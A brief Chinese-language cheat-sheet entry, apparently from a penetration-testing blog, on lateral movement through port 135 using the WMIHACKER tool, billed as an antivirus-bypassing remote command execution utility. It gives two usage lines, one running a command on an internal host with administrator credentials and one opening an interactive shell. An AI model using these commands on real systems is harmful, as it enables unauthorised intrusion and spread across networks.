利用135端口内网横向-WMIHACKER
项目地址:GitHub - rootclay/WMIHACKER: A Bypass Anti-virus Software Lateral Movement Command Execution Tool
执行命令回显:
cscript WMIHACKER_0.6.vbs /cmd 10.211.55.3 administrator "Password!" "ipconfig" 1
交互式shell
cscript WMIHACKER_0.6.vbs /shell 10.211.55.3 administrator "Password"